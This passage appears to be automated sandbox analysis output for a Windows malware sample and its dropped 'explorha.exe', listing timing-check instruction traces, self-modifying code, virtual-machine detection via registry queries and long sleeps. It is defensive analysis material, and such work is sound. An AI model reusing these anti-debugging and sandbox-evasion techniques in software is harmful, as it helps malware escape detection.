Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55E0B72 second address: 55E0BB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F449CEB073Fh 0x0000000c adc eax, 06C5295Eh 0x00000012 jmp 00007F449CEB0749h 0x00000017 popfd 0x00000018 popad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F449CEB073Ch 0x00000021 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55E0BB8 second address: 55E0BBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55E0BBE second address: 55E0C1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F449CEB0742h 0x00000012 sbb si, AFB8h 0x00000017 jmp 00007F449CEB073Bh 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007F449CEB0748h 0x00000023 sub ecx, 1FFE6A18h 0x00000029 jmp 00007F449CEB073Bh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55E0CD0 second address: 55E0CEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov ch, B1h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1023FF3 second address: 1023FF8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55F0DFC second address: 55F0E00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55F0E00 second address: 55F0E0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB073Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55F0E0F second address: 55F0E15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55F0E15 second address: 55F0E45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F449CEB073Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F449CEB0740h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55F0E45 second address: 55F0E49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55F0E49 second address: 55F0E66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0749h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55F0A6E second address: 55F0A8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, ecx 0x00000005 mov cx, 6329h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e mov edx, eax 0x00000010 mov eax, 434D6F9Dh 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55F0A8B second address: 55F0A8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55F0A8F second address: 55F0AA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 55F0AA3 second address: 55F0AF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, bl 0x00000005 call 00007F449CEB073Ah 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 pushad 0x00000011 mov ecx, ebx 0x00000013 popad 0x00000014 mov ecx, 1B610E2Bh 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c jmp 00007F449CEB073Eh 0x00000021 pop ebp 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 pushfd 0x00000026 jmp 00007F449CEB073Ch 0x0000002b sbb ecx, 1D1DB4E8h 0x00000031 jmp 00007F449CEB073Bh 0x00000036 popfd 0x00000037 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 567069D second address: 56706A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 56706A1 second address: 56706BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0749h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 56706BE second address: 56706F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 44D2h 0x00000007 jmp 00007F449CC63D83h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F449CC63D85h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 56706F4 second address: 56706FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 56608AF second address: 56608CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 56608CA second address: 5660992 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0749h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pushfd 0x0000000d jmp 00007F449CEB073Ah 0x00000012 or esi, 35FB9F58h 0x00000018 jmp 00007F449CEB073Bh 0x0000001d popfd 0x0000001e pop eax 0x0000001f push ebx 0x00000020 pushad 0x00000021 popad 0x00000022 pop ecx 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 jmp 00007F449CEB0741h 0x0000002a mov ebp, esp 0x0000002c pushad 0x0000002d push esi 0x0000002e pushfd 0x0000002f jmp 00007F449CEB0743h 0x00000034 add si, 937Eh 0x00000039 jmp 00007F449CEB0749h 0x0000003e popfd 0x0000003f pop esi 0x00000040 pushfd 0x00000041 jmp 00007F449CEB0741h 0x00000046 sbb ecx, 54D7F5B6h 0x0000004c jmp 00007F449CEB0741h 0x00000051 popfd 0x00000052 popad 0x00000053 pop ebp 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F449CEB073Dh 0x0000005b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5660992 second address: 5660998 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5660998 second address: 566099C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 56000DB second address: 560015E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F449CC63D82h 0x0000000a and si, 67F8h 0x0000000f jmp 00007F449CC63D7Bh 0x00000014 popfd 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 jmp 00007F449CC63D86h 0x0000001c push eax 0x0000001d jmp 00007F449CC63D7Bh 0x00000022 xchg eax, ebp 0x00000023 pushad 0x00000024 pushad 0x00000025 mov cx, 7721h 0x00000029 movzx ecx, bx 0x0000002c popad 0x0000002d mov dx, A91Eh 0x00000031 popad 0x00000032 mov ebp, esp 0x00000034 jmp 00007F449CC63D85h 0x00000039 pop ebp 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F449CC63D7Dh 0x00000041 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5660C1F second address: 5660C47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push dword ptr [ebp+08h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 call 00007F449CEB0746h 0x00000015 pop esi 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5660C47 second address: 5660C4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5660C4D second address: 5660C51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5660C51 second address: 5660C55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5660C55 second address: 5660CB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F449CEB0739h 0x0000000d pushad 0x0000000e mov cx, F74Bh 0x00000012 pushad 0x00000013 push esi 0x00000014 pop edx 0x00000015 movzx ecx, dx 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b pushad 0x0000001c mov ch, 9Dh 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F449CEB073Dh 0x00000025 adc ch, 00000046h 0x00000028 jmp 00007F449CEB0741h 0x0000002d popfd 0x0000002e popad 0x0000002f popad 0x00000030 mov eax, dword ptr [esp+04h] 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F449CEB0743h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5660CB6 second address: 5660CCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F449CC63D84h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5660CCE second address: 5660CD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5660CD2 second address: 5660D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F449CC63D83h 0x00000013 and ah, FFFFFF8Eh 0x00000016 jmp 00007F449CC63D89h 0x0000001b popfd 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5660D11 second address: 5660D17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5660D17 second address: 5660D1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5660D1B second address: 5660D1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5660D1F second address: 5660D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5660D31 second address: 5660D48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0743h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5660D48 second address: 5660D60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F449CC63D84h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5660DDE second address: 5660DE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5660DE4 second address: 5660DEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5660DEA second address: 5660DEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 5660DEE second address: 5660DF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8CEFE1 second address: 8CEFEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8CEFEE second address: 8CEFF3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: A424F9 second address: A42501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: A42501 second address: A42506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: A30424 second address: A3042E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F449CEB0736h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: A3042E second address: A30434 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: A30434 second address: A3043A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: A41707 second address: A41711 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F449CC63D76h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: A419FD second address: A41A01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: A41CD3 second address: A41CE8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: A41CE8 second address: A41CED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: A442E3 second address: A4435C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D1D5Bh], ebx 0x0000000f push 00000000h 0x00000011 add esi, 7F8E79C4h 0x00000017 call 00007F449CC63D79h 0x0000001c push eax 0x0000001d jmp 00007F449CC63D88h 0x00000022 pop eax 0x00000023 push eax 0x00000024 jmp 00007F449CC63D84h 0x00000029 mov eax, dword ptr [esp+04h] 0x0000002d jl 00007F449CC63D7Eh 0x00000033 jns 00007F449CC63D78h 0x00000039 push eax 0x0000003a pop eax 0x0000003b mov eax, dword ptr [eax] 0x0000003d pushad 0x0000003e ja 00007F449CC63D81h 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: A4435C second address: A44360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: A44360 second address: A443F4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F449CC63D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push ecx 0x00000010 jmp 00007F449CC63D84h 0x00000015 pop ecx 0x00000016 pop eax 0x00000017 mov edi, dword ptr [ebp+122D3B9Ch] 0x0000001d push 00000003h 0x0000001f jo 00007F449CC63D7Ch 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push eax 0x0000002a call 00007F449CC63D78h 0x0000002f pop eax 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 add dword ptr [esp+04h], 00000017h 0x0000003c inc eax 0x0000003d push eax 0x0000003e ret 0x0000003f pop eax 0x00000040 ret 0x00000041 mov esi, dword ptr [ebp+122D3BE8h] 0x00000047 push 00000003h 0x00000049 call 00007F449CC63D79h 0x0000004e push eax 0x0000004f push eax 0x00000050 jnc 00007F449CC63D76h 0x00000056 pop eax 0x00000057 pop eax 0x00000058 push eax 0x00000059 jmp 00007F449CC63D83h 0x0000005e mov eax, dword ptr [esp+04h] 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 popad 0x00000068 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: A443F4 second address: A443F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: A443F8 second address: A443FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: A443FE second address: A44404 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: A444BE second address: A44500 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007F449CC63D78h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 0000001Ch 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 push 00000000h 0x00000023 push ebx 0x00000024 xor dword ptr [ebp+122D1DCEh], edx 0x0000002a pop ecx 0x0000002b push 984C87ACh 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 pushad 0x00000034 popad 0x00000035 pushad 0x00000036 popad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: A44500 second address: A4454C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F449CEB0738h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 67B378D4h 0x00000013 js 00007F449CEB073Eh 0x00000019 push esi 0x0000001a mov edi, dword ptr [ebp+122D3E28h] 0x00000020 pop edx 0x00000021 push 00000003h 0x00000023 jmp 00007F449CEB073Dh 0x00000028 push 00000000h 0x0000002a mov dx, 9128h 0x0000002e push 00000003h 0x00000030 add dh, FFFFFFD2h 0x00000033 push 8F6B59D9h 0x00000038 pushad 0x00000039 jns 00007F449CEB0738h 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: A4454C second address: A44552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: A44552 second address: A4457E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xor dword ptr [esp], 4F6B59D9h 0x0000000d mov dword ptr [ebp+122D1CBEh], ebx 0x00000013 lea ebx, dword ptr [ebp+124491EEh] 0x00000019 mov si, 644Dh 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jbe 00007F449CEB073Ch 0x00000026 jnl 00007F449CEB0736h 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: A4457E second address: A44588 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F449CC63D76h 0x0000000a rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Special instruction interceptor: First address: E7EF39 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Special instruction interceptor: First address: 1017B72 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Special instruction interceptor: First address: 10A75A6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: 8CEF39 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: A67B72 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: AF75A6 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Code function: 0_2_05660C66 rdtsc 0_2_05660C66
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window / User API: threadDelayed 1332 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window / User API: threadDelayed 1326 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window / User API: threadDelayed 1077 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window / User API: threadDelayed 1083 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3985
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5840
Found decision node followed by non-executed suspicious APIs
